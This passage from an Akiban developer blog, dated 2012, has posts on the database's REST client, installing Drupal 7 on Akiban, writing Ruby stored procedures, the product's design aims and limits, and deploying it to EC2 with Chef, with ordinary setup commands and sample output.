        "hostname": "127.0.0.1",
        "created": 1355369527,
        "changed": 1355369527,
        "status": 1,
        "thread": "01.00/",
        "name": "devel generate",
        "mail": "devel_generate@example.com",
        "homepage": "",
        "language": "und"
    },
    {
        "cid": 304560,
        "pid": 0,
        "nid": 93451,
        "uid": 3633,
        "subject": "Abdo Ea Sudo Veniam Vulputate",
        "hostname": "127.0.0.1",
        "created": 1355369527,
        "changed": 1355369527,
        "status": 1,
        "thread": "03/",
        "name": "devel generate",
        "mail": "devel_generate@example.com",
        "homepage": "",
        "language": "und"
    },
    {
        "cid": 304559,
        "pid": 0,
        "nid": 93451,
        "uid": 3651,
        "subject": "Defui Euismod Letalis Nisl Utinam Vicis",
        "hostname": "127.0.0.1",
        "created": 1355369527,
        "changed": 1355369527,
        "status": 1,
        "thread": "02/",
        "name": "devel generate",
        "mail": "devel_generate@example.com",
        "homepage": "",
        "language": "und"
    },
    {
        "cid": 304558,
        "pid": 0,
        "nid": 93451,
        "uid": 3657,
        "subject": "Similis Te",
        "hostname": "127.0.0.1",
        "created": 1355369527,
        "changed": 1355369527,
        "status": 1,
        "thread": "01/",
        "name": "devel generate",
        "mail": "devel_generate@example.com",
        "homepage": "",
        "language": "und"
    },
    {
        "cid": 304557,
        "pid": 0,
        "nid": 93448,
        "uid": 3630,
        "subject": "Loquor Modo Ut",
        "hostname": "127.0.0.1",
        "created": 1355369527,
        "changed": 1355369527,
        "status": 1,
        "thread": "02/",
        "name": "devel generate",
        "mail": "devel_generate@example.com",
        "homepage": "",
        "language": "und"
    },
    {
        "cid": 304556,
        "pid": 0,
        "nid": 93448,
        "uid": 3648,
        "subject": "Abico Conventio Elit Quis",
        "hostname": "127.0.0.1",
        "created": 1355369527,
        "changed": 1355369527,
        "status": 1,
        "thread": "01/",
        "name": "devel generate",
        "mail": "devel_generate@example.com",
        "homepage": "",
        "language": "und"
    },
    {
        "cid": 304555,
        "pid": 0,
        "nid": 93447,
        "uid": 3646,
        "subject": "Dolor Immitto Metuo Veniam",
        "hostname": "127.0.0.1",
        "created": 1355369527,
        "changed": 1355369527,
        "status": 1,
        "thread": "04/",
        "name": "devel generate",
        "mail": "devel_generate@example.com",
        "homepage": "",
        "language": "und"
    },
    {
        "cid": 304554,
        "pid": 304553,
        "nid": 93447,
        "uid": 3633,
        "subject": "Defui Et Pertineo Premo Usitas",
        "hostname": "127.0.0.1",
        "created": 1355369527,
        "changed": 1355369527,
        "status": 1,
        "thread": "01.00.00/",
        "name": "devel generate",
        "mail": "devel_generate@example.com",
        "homepage": "",
        "language": "und"
    },
    {
        "cid": 304553,
        "pid": 304550,
        "nid": 93447,
        "uid": 3655,
        "subject": "Amet Gravis Inhibeo Roto Torqueo",
        "hostname": "127.0.0.1",
        "created": 1355369527,
        "changed": 1355369527,
        "status": 1,
        "thread": "01.00/",
        "name": "devel generate",
        "mail": "devel_generate@example.com",
        "homepage": "",
        "language": "und"
    }
]
$

Finally, I’d like to mention we have a client for node.js that can be used with our REST interface. To get information on the schemas in this server and the grouping in the drupal schema, some code using this client would look as follows:

#!/usr/bin/env coffee

ak = require('./lib/akiban_rest.js')
_  = require('underscore')

log = (msg) ->
  () ->
    console.log("========")
    console.log(msg)
    console.log("--------")
    unless arguments[0].error
      _(arguments[0].body).forEach (x) ->
        console.log(x)
    console.log(arguments) if arguments[0].error
    console.log("--------")

x = new ak.AkibanClient()

x.version(log('the server version is'))
x.schemata(log('and these are all the schemata'))
x.groups('drupal', log('all groups in the drupal schema'))

The above can be run with the coffee command like so: coffee drupal.coffee.

To retrieve a certain node with this client, the code would look like:

#!/usr/bin/env coffee

ak = require('./lib/akiban_rest.js')
_  = require('underscore')

log = (msg) ->
  () ->
    console.log("========")
    console.log(msg)
    console.log("--------")
    unless arguments[0].error
      _(arguments[0].body).forEach (x) ->
        console.log(x)
    console.log(arguments) if arguments[0].error
    console.log("--------")

x = new ak.AkibanClient()
x.get 'drupal', 'node', 2054, (res) -> log('retrieving nid 2054')(res)

Running the above example results in output like:

$ coffee drupal.coffee 
========
retrieving nid 2054
--------
{ nid: 2054,
  vid: 2054,
  type: 'page',
  language: 'und',
  title: 'Eros Iriure Pertineo Refoveo Roto Utrum',
  uid: 3661,
  status: 1,
  created: 1355369527,
  changed: 1355369527,
  comment: 0,
  promote: 1,
  sticky: 0,
  tnid: 0,
  translate: 0,
  'drupal.comment': [],
  'drupal.history': [],
  'drupal.node_access': [],
  'drupal.node_comment_statistics': 
   [ { nid: 2054,
       cid: 0,
       last_comment_timestamp: 1355369527,
       last_comment_name: null,
       last_comment_uid: 3656,
       comment_count: 0 } ],
  'drupal.node_revision': 
   [ { nid: 2054,
       vid: 2056,
       uid: 1,
       title: 'Ad Si Suscipere',
       log: '',
       timestamp: 1355369527,
       status: 1,
       comment: 0,
       promote: 1,
       sticky: 0 } ],
  'drupal.search_node_links': [] }
--------

That’s about it for this post showing off our REST access. As usual, comments are very much welcome and feel free to ping me on twitter if you would like to learn more about Akiban.

Installing Drupal 7 with Akiban

2012-12-14T00:00:00-08:00

Dries recently published a post highlighting some work we’ve done with a particular customer in the Acquia cloud. What I want to cover in this post is how to install Akiban and get a Drupal 7 site up and running on it. This post only covers a fresh installation; later posts will cover migration and augmenting an existing site instead of running it entirely on Akiban.

This post is specific to Ubuntu but Akiban runs on CentOS too (as well as OSX and Windows which we have installers for). If people would like to see information specific to those platforms, please let me know in the comments.

First things first, let’s install Akiban!

sudo apt-get install -y python-software-properties
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv 0AA4244A
sudo add-apt-repository "deb http://software.akiban.com/apt-developer/ lucid main"
sudo apt-get update
sudo apt-get install -y akiban-server postgresql-client

The above will automatically start the Akiban server process, and half of your available memory will be allocated for the JVM heap by default. If you are interested in modifying any configuration options, please see our documentation on how to do this.

Next, we’ll download Drupal 7 and install Apache along with the needed PHP database drivers for Akiban.

wget http://ftp.drupal.org/files/projects/drupal-7.17.tar.gz
tar zxvf drupal-7.17.tar.gz
sudo apt-get install -y apache2 php5-pgsql php5-gd libapache2-mod-php5 php-apc
sudo mkdir /var/www/drupal
sudo mv drupal-7.17/* drupal-7.17/.htaccess /var/www/drupal
sudo cp /var/www/drupal/sites/default/default.settings.php /var/www/drupal/sites/default/settings.php
sudo chown www-data:www-data /var/www/drupal/sites/default/settings.php
sudo mkdir /var/www/drupal/sites/default/files
sudo chown www-data:www-data /var/www/drupal/sites/default/files/
sudo service apache2 restart

The final piece of software we need is the Akiban database module for Drupal. Right now, this module is a sandbox project on drupal.org so the only way to download it is to check it out with git:

sudo apt-get install -y git
git clone http://git.drupal.org/sandbox/posulliv/1835778.git akiban
cd akiban
git checkout 7.x
cd ../
sudo cp -R akiban /var/www/drupal/includes/database/.
sudo chown -R www-data:www-data /var/www/drupal/includes/database/akiban

Notice we had to switch to the 7.x branch. The master branch in this repository is for running the module with Drupal 8.

The last thing that needs to be done is to apply a tiny patch to Drupal core. This patch only avoids the creation of 2 indexes in the menu module. These index definitions are not compatible with our current Akiban release. It’s likely this will be resolved in a future Akiban release, at which point the patch will no longer be needed:

sudo cp akiban/core.patch /var/www/drupal
cd /var/www/drupal
sudo patch -p1 < core.patch
cd

Drupal 7 can now be installed as you normally would. Just make sure to select Akiban as the database during installation!

After installation completes successfully, we want to group the tables and gather statistics for our cost-based optimizer. 2 SQL scripts are provided to achieve this. They can be run using psql like so:

psql -h localhost -p 15432 drupal -f akiban/grouping.sql
psql -h localhost -p 15432 drupal -f akiban/gather_stats.sql

The commands above assume drupal is the name of the schema in which Drupal was installed. Change it to the name of the schema you specified during installation.

That’s it! You now have a bare Drupal 7 site running on the Akiban database! I have some plans for more posts in the coming weeks. In particular, some things I plan on covering are how to migrate a Drupal site running on MySQL to Akiban and how to use Akiban as a query accelerator for a Drupal site similar to the use case in the post Dries wrote. I’ll also show what is possible with the REST access that we enable straight to our database (hint: it’s on port 8091).

Stored Procedures in Akiban

2012-11-16T00:00:00-08:00

This week, we released version 1.4.3 of Akiban. This release has a bunch of great new features and bug fixes in it. There is one new feature in this release in particular that I wanted to write about today. Akiban now has a preview implementation of stored procedures!

Now that may not sound too exciting in itself so please bear with me. What gets me excited about this feature is that in Akiban, we allow creation of stored procedures in a multitude of languages. Stored procedures can be implemented using:

Java
JavaScript
Ruby
Python
Groovy
Clojure

That’s a pretty nice selection! I’m going to show some examples in Ruby here and if people are interested in more examples, please let me know in the comments and I’ll be sure to whip up other examples in different languages.

First things first: we need to make sure Akiban is configured to allow the creation of stored procedures in Ruby. We have a pretty simple property that controls the class path for our stored procedure scripting languages - akserver.routines.class_path. I just need to make sure that property has an absolute path to where my JRuby jar is installed on my system. Once that property is set in my server.properties file, I can restart Akiban and I’m ready to go.

Let’s start with a simple example. I just want to call a procedure that returns my name.

CREATE PROCEDURE my_name(out name VARCHAR(128))
  LANGUAGE ruby PARAMETER STYLE variables AS $$
    name = 'padraig'
$$;

Now let’s call that stored procedure from the command line:

test=> call my_name();
  name   
---------
 padraig
(1 row)

test=>

Success! Our hello world example is up and running.

We don’t just have to return simple data types like that. We can also return Ruby hashes. For example, here is a stored procedure that returns a Ruby hash:

CREATE PROCEDURE ruby_hash(IN x BIGINT, IN y DOUBLE, OUT s DOUBLE, OUT p DOUBLE)
  LANGUAGE ruby PARAMETER STYLE variables AS $$
{ "p" => $x * $y,
  "s" => $x + $y }
$$;

Notice this example also demonstrates how to pass parameters to a stored procedure. Running the above stored procedure, we get:

test=> call ruby_hash(10, 100);
   s   |   p    
-------+--------
 110.0 | 1000.0
(1 row)

test=>
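Note that the result columns come back in the declared OUT order (s, then p), even though the hash lists "p" first. A plain-Ruby sketch of that name-based matching follows. It assumes each OUT parameter is looked up by name in the returned hash; the post does not show the server side, so treat the out_params list and the lookup as hypothetical. Local variables stand in for the $x and $y globals used inside the procedure.

```ruby
# Inputs matching the call above: x is an integer, y is a double.
x = 10
y = 100.0

# The same hash the procedure body evaluates to.
result = { "p" => x * y, "s" => x + y }

# Hypothetical: the OUT parameters in their declared order.
out_params = %w[s p]

# Pick each OUT value out of the hash by name, so the order of the
# hash literal does not matter.
row = out_params.map { |name| result[name] }

puts row.inspect
```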

A common example used when demonstrating a programming language is to implement a function to compute Fibonacci numbers. Hence, here is a stored procedure to do just that:

CREATE PROCEDURE fib_r(IN x DOUBLE, OUT s DOUBLE)
  LANGUAGE ruby PARAMETER STYLE java EXTERNAL NAME 'do_fib' AS $$
    def do_fib(x, s)
      s[0] = fib(x)
    end
    def fib(n)
      n < 2 ? n : fib(n - 1) + fib(n - 2)
    end
$$;

In the code above, note that PARAMETER STYLE java means that the function named with EXTERNAL NAME takes as many positional arguments as there are parameters. And an example of running it:

test=> call fib_r(10);
  s   
------
 55.0
(1 row)

test=>

A common technique used to speed up this implementation is to use memoization. A stored procedure that uses this technique follows:

CREATE PROCEDURE fib_non_r(IN x DOUBLE, OUT s DOUBLE)
  LANGUAGE ruby PARAMETER STYLE java EXTERNAL NAME 'do_fib' AS $$
    def do_fib(x, s)
      s[0] = fib(x)
    end
    $fibonacci = Hash.new{ |h,k| h[k] = k < 2 ? k : h[k-1] + h[k-2] }
    def fib(n)
      $fibonacci[n]
    end
$$;
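Outside the database, the same contrast can be sketched in plain Ruby. This is a minimal sketch, not Akiban code: the names fib_recursive, fib_memoized and FIB_MEMO are made up for illustration, and a constant replaces the global variable used in the procedure above.

```ruby
# Naive recursion: the same subproblems are recomputed many times.
def fib_recursive(n)
  n < 2 ? n : fib_recursive(n - 1) + fib_recursive(n - 2)
end

# Memoized: the Hash's default block computes and stores a missing key,
# so later lookups for that key are plain hash reads.
FIB_MEMO = Hash.new { |h, k| h[k] = k < 2 ? k : h[k - 1] + h[k - 2] }

def fib_memoized(n)
  FIB_MEMO[n]
end

puts fib_recursive(30)
puts fib_memoized(30)
```

The default block only runs for keys the hash has not seen yet, so each Fibonacci number is computed once and then reused.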

Let’s turn on some timing and compare the recursive version with the version that uses memoization.

test=> call fib_r(30);
    s     
----------
 832040.0
(1 row)

Time: 469.492 ms
test=>

test=> call fib_non_r(30);
    s     
----------
 832040.0
(1 row)

Time: 4.649 ms
test=>

As expected, the version that uses memoization is much faster. Next I’m going to write a stored procedure that returns some data from a query. Let’s say I create a simple table and insert some data into it like so:

test=> create table t1(id int);
CREATE TABLE
test=> insert into t1 values (1), (2), (3), (4), (5), (6);
INSERT 0 6
test=>

This stored procedure will return all the data from that table, ordered by ID in descending order. A simple procedure to do that is:

CREATE PROCEDURE get_data()
  LANGUAGE ruby PARAMETER STYLE variables AS $$
    conn = java.sql.DriverManager.get_connection("jdbc:default:connection")
    conn.create_statement.execute_query("SELECT id FROM t1 ORDER BY id DESC")
$$;

And let’s call the stored procedure and see what kind of results we get:

test=> call get_data();
 id 
----
  6
  5
  4
  3
  2
  1
(6 rows)

test=>

As a last example, I want to extend this example and have an input parameter that filters the query results to only return ID values that are greater than whatever the input value is.

CREATE PROCEDURE get_data(IN filter BIGINT)
  LANGUAGE ruby PARAMETER STYLE variables AS $$
    conn = java.sql.DriverManager.get_connection("jdbc:default:connection")
    conn.create_statement.execute_query("SELECT id FROM t1 WHERE id > #{$filter} ORDER BY id DESC")
$$;

Running the above procedure with a valid input value yields:

test=> call get_data(2);
 id 
----
  6
  5
  4
  3
(4 rows)

test=>

The above were some simple examples of writing stored procedures in Ruby with Akiban. I’ll likely write another post with some more advanced examples when I get a chance. If this interested you, definitely download the 1.4.3 release and play around with it to try this out for yourself. If anybody has any questions or would like more examples and information, please ask in the comments or on our public mailing list and I’ll be happy to answer.

Why Build a New SQL Database?

2012-11-12T00:00:00-08:00

When I’m at conferences or meetups and people discover I work for a company building a new database, there are usually a few puzzled looks. Explaining the technology behind Akiban to people is easy but the usual reason for the puzzlement is that many people wonder why on earth a company would want to develop a new database from scratch when so many alternatives already exist.

There are good reasons, but I’ve struggled with articulating them especially when someone wants a 90 second explanation at a conference. In the interest of having an answer that I can easily refer people to, here’s what I think we’re trying to do. These are the problems that Akiban is aiming to solve.

Problems Akiban Solves

1) The object-relational impedance mismatch

Frequently referred to as the “Vietnam of computer science”, this problem is defined by Wikipedia as:

“a set of conceptual and technical difficulties that are often encountered when a relational database is being used by a program written in an object-oriented programming language or style”

Typically, each class in an application is mapped to a table in the backend database with the fields of that class being columns of the table and each instance of that class is a row in the corresponding table. In Akiban, application objects map to what we call table groups. Table groups are fundamentally a way of storing data - we store data as interleaved rows in a B+ Tree. Or more simply put, Akiban stores data hierarchically.
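To make “interleaved rows” a little more concrete, here is a small plain-Ruby sketch. It only illustrates the idea and is not Akiban’s storage format: the customers and orders tables, their columns, and the hierarchical key layout are all assumptions made up for this example.

```ruby
# Hypothetical rows from two related tables: customers and their orders.
customers = [{ cid: 1, name: 'Ann' }, { cid: 2, name: 'Bob' }]
orders = [
  { oid: 10, cid: 2, total: 5 },
  { oid: 11, cid: 1, total: 7 },
  { oid: 12, cid: 1, total: 3 }
]

# Give every row a hierarchical key: a parent row is keyed by its own id,
# a child row by its parent's id followed by its own id.
entries = customers.map { |c| [[c[:cid]], [:customer, c]] } +
          orders.map { |o| [[o[:cid], o[:oid]], [:order, o]] }

# Sorting by that key places each customer's orders directly after the
# customer row, which is the ordering a tree keyed this way would keep.
interleaved = entries.sort_by { |key, _| key }.map { |_, row| row }

interleaved.each { |type, row| puts "#{type}: #{row}" }
```

With the rows laid out like this, reading one customer together with all of its orders is a single contiguous scan rather than a join between two separately stored tables.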

This makes integration of Akiban with existing ORMs an interesting proposition since we expose methods of retrieving table groups directly through SQL. For example, Mike Bayer recently implemented support for Akiban in the SQLAlchemy ORM for Python. We are also working on support for Doctrine in the PHP world and ActiveRecord in the Ruby world.

Dr. Eric Brewer also touched on this in his closing talk at RICON 2012 (which seems to have been an excellent conference based on the posted videos). One quote from Dr. Brewer that really stuck out in my mind was - “instead of clean database where tables are joined at last minute. I actually want to have pre-joined them. I don’t really want to do more than 1 query”. That ties in nicely with what we allow by exposing methods to retrieve table groups or part of a table group with nested SQL i.e. in 1 query, an entire table group or part of a table group can be retrieved.

2) SQL (performance) doesn’t have to suck

SQL gets a bad rap. I’m not 100% sure if that’s because people don’t like the language or because poor experiences have convinced them that the performance of SQL queries is terrible. Perhaps it’s a little bit of both. What’s great about SQL is that so-called ‘neck-tie’ programmers can easily use this declarative language to interact with a database system. To quote again from Dr. Brewer’s RICON talk - “having a language for them is a good idea. nosql does not really talk to these people”.

SQL can be used to solve many problem types. I once heard someone quip, “there’s a SQL query for that”, meaning it’s likely there are not many problems out there SQL cannot solve.

SQL performance in Akiban is greatly improved due to table grouping and the fact that our entire system (in particular our query optimizer and execution engine) is built from the ground up with this storage architecture in mind. First off, queries that join tables within a single table group can execute without the need for a join operation. This is due to how we store related data in table groups hierarchically. Second, group indexes can be created on top of a table group. This means that indexes can be created on columns from more than 1 table. Third, our optimizer can choose from a number of query execution plans that use multiple indexes, such as index intersection and index merging, thereby reducing the amount of data that needs to be processed during various stages of query execution.
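As a rough illustration of index intersection, the sketch below intersects two sorted lists of row IDs, as if each list came from scanning a different index. The function name and the sample IDs are hypothetical, and this is the generic merge-style technique rather than Akiban’s actual execution engine.

```ruby
# Merge-style intersection of two sorted arrays of row IDs.
# Each array stands in for the row IDs matched by one index scan.
def intersect_sorted(a, b)
  result = []
  i = 0
  j = 0
  while i < a.length && j < b.length
    case a[i] <=> b[j]
    when 0
      # Present in both index scans: keep the row ID.
      result << a[i]
      i += 1
      j += 1
    when -1
      i += 1 # a is behind, advance it
    else
      j += 1 # b is behind, advance it
    end
  end
  result
end

status_matches = [1, 3, 5, 7, 9]  # hypothetical: rows matching one predicate
author_matches = [3, 4, 5, 9, 10] # hypothetical: rows matching another
puts intersect_sorted(status_matches, author_matches).inspect
```

Only the rows that survive the intersection need to be fetched, which is where the reduction in processed data comes from.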

3) Do We Always Need ETL?

Why is ETL brought up as a solution when someone talks about running complex reports? Obviously in some environments, an ETL process is absolutely needed. But wouldn’t we ideally like to perform queries typically performed in data warehouse environments in real-time without the requirement for a separate process to be performed? This process is typically needed because operational systems cannot handle the load that would be generated if complex reports were run against them. Running these types of queries against an operational system would likely cripple it (this is obviously a simplification of a complex process). We’ve had many customers come to us running reports against their operational database and they don’t feel like they should need to construct a data warehouse for the relatively simple reports they wish to run on their data. We tend to agree in some cases.

Depending on who I am talking to, I either get someone really excited when I talk about this (marketing/sales people get all excited due to buzz words like ETL and real time) or am met with a groan and slight roll of the eyes (technical person who thinks I am full of shit). I can see why it comes across sounding like something a sales person would say without actually knowing what they are talking about. I do feel our message here needs to be worked on but with the release of projects like Impala from Cloudera and Spire from Drawn to Scale, I feel it’s clear there is huge interest in a solution in this area. Akiban can help people fighting these types of problems.

4) Augmenting Existing Deployments

Our long-term goal is to become the main database for a customer and the database of choice when a developer starts a new project, but we understand it’s difficult for someone who has developed an entire application with an existing database like MySQL or PostgreSQL to switch. What we have developed to deal with this reality is so-called adapters for existing systems. Our first publicly available adapter is for MySQL and this allows a user to spin up a regular MySQL slave and convert whatever tables they are interested in being part of a table group to Akiban.

What Akiban is Not Good For (right now)

Now if you’ve read this far, you might be expecting me to list another problem that we solve as world hunger or something like that. We of course have some use cases where we are not suitable and some drawbacks. So let’s balance the 4 problems I feel Akiban solves with 4 reasons why you might be reluctant to use Akiban at this present time.

1) Scale out is coming, but not here yet.

Today Akiban is focused on single node performance but with an eye to developing scale out functionality in the near future. Our scale out capability is under development but it is not expected to be production ready until next year.

This assumes you want to deploy Akiban as your main database. If you are deploying Akiban as a MySQL replica in an existing MySQL environment, there is no reason multiple MySQL slaves with Akiban cannot be spun up.

2) Simple Queries or No Problems

If your application really only issues simple queries and does not use an ORM, then Akiban is not really a fit. I would be surprised if someone with such a workload would be experiencing problems.

If your existing solution is working just fine for you, why change? You would be surprised at the number of customers we talk to who really have no need for our solution since they have no problems or are unlikely to have any need for Akiban in the near future. We are of course happy to work with these customers but we tell them straight up that they probably don’t need Akiban.

3) Maturity

Obviously many of the existing relational databases on the market today have a head start on us here (PostgreSQL by almost 30 years). If you are looking for a database solution that has been around for a long time and deployed countless times, Akiban may not be what you are looking for. I will add though that we have a few customers where we have been deployed for almost a year (public customer testimonials coming in the next few weeks all going well).

However, I will say that this is another reason why we are working on adapters for other database systems. If you are not comfortable trying out a new database like Akiban, spinning it up as a slave in your staging/development environment for testing purposes is pretty low risk and will not affect any existing infrastructure.

4) Existing knowledge

This leads on from point (3) above. If you have built a large infrastructure on another database, it’s likely your staff is highly skilled in that database platform. While Akiban is quite easy to use and administer, as with other database systems, some knowledge of Akiban needs to be gained in order to use the system in the best manner possible. Also since Akiban is a new solution, not as much troubleshooting information is available publicly. For example, when encountering an issue in MySQL, a simple Google search is likely to result in being led to a page where someone else has documented a resolution for the issue.

Conclusion

This post was an honest attempt at stating what I personally think Akiban is a great solution for and what we are currently not a good fit for. My personal opinion (obviously biased since I work for Akiban) is that the problems we are solving far outweigh the drawbacks of our solution. We will have a scale out strategy in less than a year which is obviously important and you can be sure I will be blogging about that as we develop it. I’d also like to mention that points (3) and (4) in the list of disadvantages apply to any database solution that is relatively new and so are not unique to Akiban.

Input on what we are doing at Akiban is very important to us. If you have any comments that you would like to add, please leave them here or ask on our public mailing list. Also, if you are curious to try the product out, it can be downloaded for free here.

Deploying Akiban on EC2 with Chef

2012-09-26T00:00:00-07:00

This post is a tutorial on how to deploy Akiban on an EC2 instance using chef and the Opscode Chef platform.

The Opscode Platform

In this article, we’ll use the Opscode platform since it provides an easy way for anyone to get started with chef. If you are a new user, proceed to sign up for a new account. Once you are signed up, the next step is to create a new organization. For this article, I’m going to create an organization named akiban. Once your organization is created, you should see the organization in your list of organizations when you click on the Organizations link at the top right of the opscode console. My view looks like:

Configure AWS

An assumption made in this article is that you have an AWS account. If you don’t, signing up is relatively straightforward.

Amazon blocks all incoming traffic to EC2 instances by default and SSH is used by chef to access and bootstrap a newly created instance. We want to allow SSH traffic to our EC2 instances and I don’t want to use the default security group so for this article I created a new security group named akiban with the appropriate rules (only SSH for now). After creating the new security group and adding the SSH rule, the group details for akiban look like:

I also created a new key pair specifically for this article. I gave this key pair the name akiban. After creating this key pair, I downloaded the private key to my SSH folder and updated the permissions on the key:

mv ~/Downloads/akiban.pem ~/.ssh/
chmod go-r ~/.ssh/akiban.pem

Configure chef

This article assumes both chef and git are already installed on your workstation. In my case, I ran all these commands on an OS X laptop. Instructions for installing chef can be found on Opscode’s wiki.

The first thing to do is create a chef repository on your workstation with git and get a clean history:

git clone git://github.com/opscode/chef-repo.git ~/akiban-chef-repo
cd ~/akiban-chef-repo
rm -rf .git
git init .
git add *
git commit -a -m "Initial commit."

The chef repository is a version controlled directory that contains cookbooks and other components relevant to chef.

Next, create a .chef directory within this repository. This directory contains all the configuration files for just this chef repository:

mkdir -p ~/akiban-chef-repo/.chef

Next, we need to download keys and knife configuration files from the Opscode platform that will be used for interacting with the Opscode platform. Keys are needed for both your user and organization on the Opscode platform. To retrieve your user key (if you did not download it when signing up), click on your username through the console and click View profile on the right of that page. Finally, click the get private key link on your account page as seen below:

After downloading this new key, I placed it in the configuration directory for the chef repository I am using for this article:

mv ~/Downloads/posulliv.pem ~/akiban-chef-repo/.chef

For your organization, click on the Regenerate validation key link and Generate knife config link from the organizations home page. After clicking those 2 links, you will have 2 files (dependent on your organization name obviously): 1) akiban-validator.pem and 2) knife.rb. These 2 files must be moved into the configuration directory for the chef repository being used for this article:

mv ~/Downloads/akiban-validator.pem ~/akiban-chef-repo/.chef
mv ~/Downloads/knife.rb ~/akiban-chef-repo/.chef

Now, whenever we are in the akiban-chef-repo directory, the knife utility will connect to the Opscode platform. To verify this, let’s list out the current clients our hosted chef server knows about:

killarney:akiban-chef-repo posullivan$ knife client list
  akiban-validator
killarney:akiban-chef-repo posullivan$

Next, knife needs to be configured with the correct AWS credentials. This is done by adding the following 2 lines to the knife.rb file in the ~/akiban-chef-repo/.chef directory:

knife[:aws_access_key_id]     = "Your AWS Access Key"
knife[:aws_secret_access_key] = "Your AWS Secret Access Key"

After adding these credentials the EC2 instances associated with the AWS account can be viewed:

killarney:akiban-chef-repo posullivan$ knife ec2 server list
Instance ID  Public IP       Private IP      Flavor      Image         SSH Key        Security Groups  State  
i-1bcb4f77   50.16.188.89    10.112.233.119  t1.micro    ami-548c783d  akibanweb      AkibanWeb        running
i-f814fe97                                   m1.large    ami-548c783d  akibanxxx      akibanxxx        stopped
i-39474442   23.20.173.62    10.64.5.187     t1.micro    ami-aecd60c7  designpartner  designpartner    running
killarney:akiban-chef-repo posullivan$

Akiban Cookbook

chef is now configured to work with the appropriate AWS account. Now we want to bootstrap an EC2 instance with the latest early developer release of Akiban. In my previous post I covered the cookbook we developed for Akiban; we place that in our chef repository like so:

knife cookbook site install akibanserver

This downloads the latest release of the akibanserver cookbook from the opscode community site. Next, we want to upload this cookbook to our hosted chef server:

cd ~/akiban-chef-repo
knife cookbook upload akibanserver --include-dependencies

We can verify this cookbook (and its dependencies) are now available:

killarney:akiban-chef-repo posullivan$ knife cookbook list
  akibanserver   0.1.0
  apt            1.4.8
  openssl        1.0.0
  postgresql     1.0.0
killarney:akiban-chef-repo posullivan$

Create and Verify EC2 Instance

We are now ready to create an EC2 instance and have it bootstrap itself and install the Akiban developer edition! Feel free to pick any CentOS or Ubuntu AMI you wish for the command below:

knife ec2 server create \
--run-list akibanserver \
--image ami-2d4aa444 \
--flavor m1.small \
--groups akiban \
--ssh-key akiban \
--identity-file ~/.ssh/akiban.pem \
--ssh-user ubuntu \
--node-name akibantest \
--availability-zone us-east-1a

After kicking off the above command, you will see lots of output! Assuming the command finishes successfully, we can verify the server was created. First, we check that it appears in the server list output from EC2:

killarney:akiban-chef-repo posullivan$ knife ec2 server list
Instance ID  Public IP       Private IP      Flavor      Image         SSH Key        Security Groups  State  
i-1bcb4f77   50.16.188.89    10.112.233.119  t1.micro    ami-548c783d  akibanweb      AkibanWeb        running
i-f814fe97                                   m1.large    ami-548c783d  akibanxxx      akibanxxx        stopped
i-39474442   23.20.173.62    10.64.5.187     t1.micro    ami-aecd60c7  designpartner  designpartner    running
i-fd17d380   184.72.187.226  10.34.106.161   m1.small    ami-2d4aa444  akiban         akiban           running
killarney:akiban-chef-repo posullivan$

The chef server should also list this instance as a node now:

killarney:akiban-chef-repo posullivan$ knife node list
akibantest
killarney:akiban-chef-repo posullivan$

The instance is now available and we can log on and start using the akiban server:

killarney:akiban-chef-repo posullivan$ ssh -i ~/.ssh/akiban.pem ubuntu@184.72.187.226
Linux ip-10-34-106-161 2.6.32-305-ec2 #9-Ubuntu SMP Thu Apr 15 04:14:01 UTC 2010 i686 GNU/Linux
Ubuntu 10.04 LTS

Welcome to Ubuntu!
 * Documentation:  https://help.ubuntu.com/

  System information as of Wed Sep 26 20:28:34 UTC 2012

  System load: 0.54             Memory usage: 16%   Processes:       54
  Usage of /:  9.3% of 9.92GB   Swap usage:   0%    Users logged in: 0

  Graph this data and manage this system at https://landscape.canonical.com/
---------------------------------------------------------------------
At the moment, only the core of the system is installed. To tune the 
system to your needs, you can choose to install one or more          
predefined collections of software by running the following          
command:                                                             
                                                                     
   sudo tasksel --section server                                     
---------------------------------------------------------------------

New release 'precise' available.
Run 'do-release-upgrade' to upgrade to it.

A newer build of the Ubuntu lucid server image is available.
It is named 'release' and has build serial '20120913'.
*** System restart required ***
Last login: Wed Sep 26 20:23:13 2012 from 75-147-9-1-newengland.hfc.comcastbusiness.net
ubuntu@ip-10-212-87-144:~$ psql -h localhost -p 15432 information_schema
psql (8.4.13, server 8.4.7)
Type "help" for help.

information_schema=> select * from server_instance_summary;
  server_name  | server_version | instance_status |     start_time      
---------------+----------------+-----------------+---------------------
 Akiban Server | 1.4.1.2151     | RUNNING         | 2012-09-26 20:30:04
(1 row)

information_schema=>

Conclusion

Following the steps in this article, it should be pretty easy to spin up an EC2 instance with Akiban installed on it with chef. We are currently starting work on a cookbook for the Akiban Adapter for MySQL. When that is available, a post detailing how to use that will be posted.

Akiban Server Cookbook for Chef

2012-08-22T00:00:00-07:00

Last week I spent some time putting together a cookbook for Akiban that allows the Akiban Server to be easily deployed in environments where chef is used. This cookbook is currently available on github.

This cookbook uses the awesome new tool Opscode announced last week - Test Kitchen. This makes testing of our cookbook extremely easy for us. Right now, the tests for the Akiban Server cookbook are very similar to the tests developed for the MySQL cookbook. On a system with kitchen installed, the cookbook can be downloaded and its tests run by simply running:

kitchen test

Running the above results in a virtual machine being downloaded and started using vagrant. The virtual machine is then provisioned using chef and the cookbook under test is set up. The Akiban Server cookbook installs the PostgreSQL client (since the Akiban Server speaks the PostgreSQL protocol) and the Akiban Server. The tests run to verify everything is working ok are pretty simple at the moment: some data is loaded in to a single table and a few simple queries are run to make sure the database server is functioning correctly.

One other neat thing we set up is the Travis build system, which makes sure our cookbook adheres to best practices by running foodcritic on every new push to master.

Test Kitchen and foodcritic together help us to ensure our cookbooks are high quality. Our main goal is to make sure our customers enjoy the easiest deployment process and since we see many people using chef, we wanted to make sure we integrate well with environments where chef is in place.

I plan on doing a webinar in the near future on deploying Akiban Server with chef. In that webinar, I will be able to do some demos of deploying Akiban in EC2 with chef.

Digging into Drupal's Schema

2012-08-02T00:00:00-07:00

I’m relatively new to Drupal internals and most of the work I do is on the database side. While searching for information on Drupal’s schema, I found very little. During my research, I put together an ER diagram of the schema installed by Drupal 7 (D8 is very similar with only 3 extra tables at time of writing) and decided to share my work. Note that the relationships I discuss here are based on the foreign key documentation that exists in core and my understanding of what I believe other relationships could be. Corrections and comments are very much welcome.

Overview

